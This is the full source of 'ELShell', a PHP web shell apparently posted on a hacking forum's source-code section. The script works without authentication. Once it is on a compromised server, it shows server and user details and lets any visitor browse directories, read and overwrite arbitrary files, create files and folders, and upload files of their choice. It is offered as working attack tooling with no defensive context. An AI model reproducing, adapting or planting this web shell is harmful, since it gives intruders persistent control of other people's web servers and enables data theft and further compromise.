r00tsecurity -> Source Code Center :: ELShell, Super Simple old

<?PHP       
   $data = $_GET['data'];
   $server = $_SERVER['SERVER_NAME'];
   $script = $_SERVER['PHP_SELF'];
   $docroot = $_SERVER['DOCUMENT_ROOT'];
   $version = "v1.0";
   function GetStats()
   {//elchupa
       return "<b><BR>Space on HDD:</b> ".( @disk_free_space("/") / (1024 * 1024 ) ).
            "<b><BR>Total Space on HDD:</b> ".( @disk_total_space("/") / (1024 * 1024 ) );
   }      
   function GetSelf( $file)
   {//elchupa
      return @dirname( $file );
   }
   function GetServerPhpInfo()
   {//elchupa
      if( ( @ini_get( "safe_mode" ) == "" ) || ( @ini_get( "safe_mode" ) == null ) )
         $safeon = true;
       return  '<b>Server Name:</b> <a href="javascript:ServerWindow()">'.$_SERVER['SERVER_NAME']."</a>\n".
            "<b><br>Server OS:</b> ".PHP_OS.
            "<b><br>PHP Version:</b> ".@phpversion().
            "<b><br>Safe_Mode:</b> ".($safeon?"<font color='green'>off</font>":"<font color='#CC0000'>on</font>").
            "\n<b><br>Current User:</b> ".@get_current_user();
   }
   function GetPermissions( $file )
   {
      $t = @fileperms( $file );
      $tmp .= (( $t & 0x0100) ? '<font color="green">r</font>' : '<font color="red">-</font>');
      $tmp .= (($t & 0x0080 ) ? '<font color="green">w</font>' : '<font color="red">-</font>');
      $tmp .= (($t & 0x0040 ) ? (($t & 0x0800) ? 's' : '<font color="green">x</font>' ) : (($t & 0x0800) ? 'S' : '-'));
      $tmp .= "|".(($t & 0x0020) ? '<font color="green">r</font>' : '-');
      $tmp .= (($t & 0x0010) ? '<font color="green">w</font>' : '-');
      $tmp .= (($t & 0x0008) ? (($t & 0x0400) ? 's' : '<font color="green">x</font>' ) : (($t & 0x0400) ? 'S' : '-'));
      $tmp .= "|".(($t & 0x0004) ? '<font color="green">r</font>' : '-');
      $tmp .= (($t & 0x0002) ? '<font color="green">w</font>' : '-');
      $tmp .= (($t & 0x0001) ? (($t & 0x0200) ? 't' : '<font color="green">x</font>' ) : (($t & 0x0200) ? 'T' : '-'));
      return $tmp;
   }
   function GetOwner( $file )
   {//elchupa
      $owner = @posix_getpwuid( @fileowner( $file ) );
      if( @strcmp( $owner, @get_current_user() ) == 0 )
      {
         return "<b>".$owner['name']."</b>";
      }   
      return $owner['name'];
   }
   function GetFileType( $file )
   {//elchupa
      $t = explode( ".", $file );
      return "<b>".$t[sizeof( $t ) - 1]."</b>";
   }
   function DisplayDir( $dir )
   {//elchupa
      @chdir( $dir );
      $eh = @opendir( @getcwd() );
      $tmp = "<BR><b>Current Dir:</b><font class='file'>".@getcwd()."</font>\n";
      $tmp .= "<table border = '0' cellpadding='1' cellspacing = '1'>\n<th align=left><div class=file_head>.:Name:.</div></th><th align=left><div class=file_head>.:Type:.</div></th>".
            "<th align=left><div class=file_head>.:Size:.</div></th><th align=left>.:Permissions:.</th><th align=left>.:Owner:.</div></th>\n";
      $ar = array();
      $dir = array();
      while( ( $th = @readdir( $eh ) ) !== false )
      {
         if( @is_dir( $th ) )
         {
            $dir[] = $th;
         }
         else if( @is_file( $th ) )
         {
            $ar[] = $th;
         }
      }
      @sort( $ar );
      for( $i = 0; $i < sizeof( $dir ); $i++ )
      {//elchupa
         $th = $dir[$i];
         $tmp .= "<tr>";
         if( @strcmp( $th, ".." ) == 0 )
         {
            $a = @getcwd()."/&#46;&#46;/";
            $tmp .= "<td ><div class='updir'>[-<a href='?act=dir&data=".$a."'>$th</a>-]</div></td><td><b>DIR</b></td><td>N/A</td><td>".GetPermissions( $th )."</td><td>".GetOwner( $th )."</td>";
         }
         else
         {
            $a = @getcwd()."/".$th;
            $tmp .= "<TD><div class='dir'>[-<a href='?act=dir&data=".$a."'>$th</a>-]</div></td><td><b>DIR</b></td><td>N/A</td><td>".GetPermissions( $th )."</td><td>".GetOwner( $th )."</td>";
         }
         $tmp .= "</tr>\n";
      }
      for( $i = 0; $i < sizeof( $ar ); $i++ )
      {//elchupa
         $th = $ar[$i];
         $tmp .= "<tr>";
         $tmp .= "<td><div class='file'><a href=?act=open&data=".getcwd()."/$th>$th</a></td><td>".GetFileType( $th )."</td><td>".(round( @filesize( $th ) / 1024, 2) )."kb</td><td>".
               GetPermissions( $th )."</td><td>".GetOwner( $th )."</td></tr>\n";
      }
      $tmp .= "</table>";
      return $tmp;
   }
   $html = "<HTML><HEAD><meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'>
         <TITLE>.:.".$server.".:.ELShell.:.".$version.".:.</TITLE>".
         "<STYLE type = 'text/css'><!-- .updir { color:#CC0000; } .dir { color:#33FF33; } .file { color:#009900; } .file_head { color:#000000; } table { margin-left: auto; margin-right: auto;} -></STYLE>\n
         <SCRIPT language='JavaScript'>
         function ServerWindow()
         {//elchupa
            window.open('http://".$server."','".$server."','width=500,height=200,toolbar=yes,location=yes,directories=yes,status=yes,menubar=yes,scrollbars=yes,copyhistory=yes,resizable=yes');
         }
         </SCRIPT></HEAD>\n";
   $html .=
   "<table><tr><td><h1 style='font-size:35%;font-family:Courier New'>----------------------------L+L\n<br>-------------------------L+++++L\n<br>----------------------L+++++++++L\n<br>----------------E-E----L+++++++++L\n<br>-------------E+++++E----L+++++++++L------------------SSSSSSSSSSSSSSSSSSSSSSSSSSS--HHHHHHH-------HHHHHHH--EEEEEEEEEEEEEEEEEEEE--LLLLLLL----------------LLLLLLL\n<br>----------E+++++++++E----L+++++++++L-----------------S+++++++++++++++++++++++++S--H+++++H-------H+++++H--E++++++++++++++++++E--L+++++L----------------L+++++L\n<br>
    -------E+++++++++++++E----L+++++++++L----------------S+++++++++++++++++++++++++S--H+++++H-------H+++++H--E++++++++++++++++++E--L+++++L----------------L+++++L\n<br>---E+++++++++++++E---------L+++++++++L---------------S+++++++SSSSSSSSSSSSSSSSSSS--H+++++H-------H+++++H--E+++++++EEEEEEEEEEEE--L+++++L----------------L+++++L\n<br>E+++++++++++++E-------------L+++++++++L--------------S+++++++S--------------------H+++++H-------H+++++H--E+++++++E-------------L+++++L----------------L+++++L\n<br>
    -E++++++++E---------E--------L+++++++++L-------------S+++++++S--------------------H+++++H-------H+++++H--E+++++++E-------------L+++++L----------------L+++++L\n<br>--E+++++++E------E+++E--------L+++++++++L--------L---S+++++++S--------------------H+++++HHHHHHHHH+++++H--E+++++++EEEEEEEEEE----L+++++L----------------L+++++L\n<br>---E+++++++E--E+++++++E--------L+++++++++L---L+++++L-S+++++++SSSSSSSSSSSSSSSSSSS--H+++++++++++++++++++H--E++++++++++++++++E----L+++++L----------------L+++++L\n<br>----E+++++++E++++++++++E--------L++++++++++L++++++++LS+++++++++++++++++++++++++S--H+++++HHHHHHHHH+++++H--E+++++++EEEEEEEEEE----L+++++L----------------L+++++L\n<br>-----E+++++++++++++E-------------L+++++++++++++++++++LSSSSSSSSSSSSSSSS+++++++++S--H+++++H-------H+++++H--E+++++++E-------------L+++++L----------------L+++++L\n<br>------E+++++++E-------------E-----L++++++++++++++L-------------------S+++++++++S--H+++++H-------H+++++H--E+++++++E-------------L+++++L----------------L+++++L\n<br>
    -------E+++++++E---------E+++E-----L+++++++++L-------SSSSSSSSSSSSSSSSS+++++++++S--H+++++H-------H+++++H--E+++++++EEEEEEEEEEEE--L+++++LLLLLLLLLLLLLLL--L+++++LLLLLLLLLLLLLLL\n<br>--------E+++++++E----E++++++++E-----L++++L-----------S+++++++++++++++++++++++++S--H+++++H-------H+++++H--E++++++++++++++++++E--L+++++++++++++++++++L--L+++++++++++++++++++L\n<br>---------E+++++++E+++++++++++++E-----L---------------S+++++++++++++++++++++++++S--H+++++H-------H+++++H--E++++++++++++++++++E--L+++++++++++++++++++L--L+++++++++++++++++++L\n<br>
    ----------E+++++++++++++++++E------------------------SSSSSSSSSSSSSSSSSSSSSSSSSSS--HHHHHHH-------HHHHHHH--EEEEEEEEEEEEEEEEEEEE--LLLLLLLLLLLLLLLLLLLLL--LLLLLLLLLLLLLLLLLLLLL\n<br>-----------E+++++++++++++E-----------------------------------\n<br>------------E++++++++E-------by: elchupathingy---------------\n<br>-------------E+++E-------------------------------------------\n<br>--------------E----------------------------------------------\n<br></h1>";
   $html .="<body bgcolor='#999999' link='#000000' alink='#666666'>\n".GetServerPhpInfo().GetStats()."\n<br><a href='?act=dir&data=".$docroot.GetSelf( $script )."'>Home</a>\n<a href='javascript:javascript:history.go(-1)'>Back</a>\n";
   if( isset( $_GET['act'] ) )
   {
      if( @strcmp( $_GET['act'], "open" ) == 0 )
      {
         $html .= "<BR><b>Opened:</b> <font class=file>".$data."</font>";
         $farr = @file( $data );//0x656C6368757061
         $html .= "<form name='savefile' action='?act=save&data=".GetSelf( $data )."' method='post'><BR><textarea name='openedfile' rows='25' cols='90'>";
         for( $i = 0; $i < sizeof( $farr /*0x656C6368757061*/); $i++ )
         {
            $html .= @htmlspecialchars( $farr[$i] );
         }
         $html .= "\n<!--//elchupathingy</textarea><input type='hidden' name='path' value='".$data."'><br><input type='submit' value='Save File'></form>";
      }
      else if( @strcmp( $_GET['act'], "dir" ) == 0 )
      {
         $html .= DisplayDir( $data );
      }
      else if( @strcmp( $_GET['act'], "save" ) == 0 )
      {
         if( isset( $_POST['openedfile'] ) && isset( $_POST['path'] ) )
         {
            if( ( $file = @fopen( $_POST['path'], "w" ) ) !== false )
            {
               @fwrite( $file, $_POST['openedfile'] );
               $html .= DisplayDir( $data )."<br><font color='green'>File <b>".$_POST['path']."</b> saved Succesfully.";
            }
            else
            {
               $html .= DisplayDir( $data )."<br><font color='#CC0000'>File ".$_POST['path']." save Failed.";
            }
         }
      }      
      else if( @strcmp( $_GET['act'], "crtfile" ) == 0 )
      {
         if( ( $file = @fopen( $data."/".$_POST['newfile'], "x" ) ) !== false )
         {
            @fclose( $file );
            $html .= DisplayDir( $data )."<br><font color='green'>Creating File <a href='?act=open&data=".getcwd()."/".$_POST['newfile']."'>".$_POST['newfile']."</a> Successful.</font>";
         }
         else
         {
            $html .= DisplayDir( $data )."<br><font color='#CC0000'>Creating File ".$_POST['newfile']." Failed.</font>";
         }
      }
      else if( @strcmp( $_GET['act'], "crtdir" ) == 0 )
      {
         if( ( @mkdir( $data."/".$_POST['newdir'] ) ) !== false )
         {
            $html .= DisplayDir( $data )."<br><font color='green'>Creating Directory <a href='?act=open&data=".getcwd()."/".$_POST['newdir']."'>".$_POST['newdir']."</a> Successful.</font>";
         }
         else
         {
            $html .= DisplayDir( $data )."<br><font color='#CC0000'>Creating Directory ".$_POST['newdir']." Failed.</font>";
         }
      }
      else if( @strcmp( $_GET['act'], "up" ) == 0 )
      {
         if( @move_uploaded_file( $_FILES['upfile']['tmp_name'], $data."/".basename( $_FILES['upfile']['name'] ) ) )
         {
            $html .= DisplayDir( $data )."<br><font color='green'>File <a href='?act=open&data=".getcwd()."/".basename( $_FILES['upfile']['name'] )."'>".basename( $_FILES['upfile']['name'] )."</a> Uploaded Succesfully</font>\n";
         }
         else
         {
            $html .= DisplayDir( $data )."<br><font color='#CC0000'>File <b>".basename( $_FILES['upfile']['name'] )."</b> Upload Failed</font>\n";
         }
      }
         
   else
   {
      $html .= "<br><b>Hit the Home link to use.<br> Enjoy, elchupathingy</b>\n";
   }
   $html .= "<br><form name='createfile' action='?act=crtfile&data=".@getcwd()."' method='post'><input type='text' name='newfile' size='30'><input type='submit' value='Create File'></form>\n".
          "<form name='createdir' action='?act=crtdir&data=".@getcwd()."' method='post'><input type='text' name='newdir' size='30'><input type='submit' value='Create Dir'></form>\n".
          '<form enctype="multipart/form-data" action="?act=up&data='.getcwd().'" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="100000"><input name="upfile" type="file"><input type="submit" value="Up"></form>';
   echo $html."</td></tr></table></body></HTML>";   
?>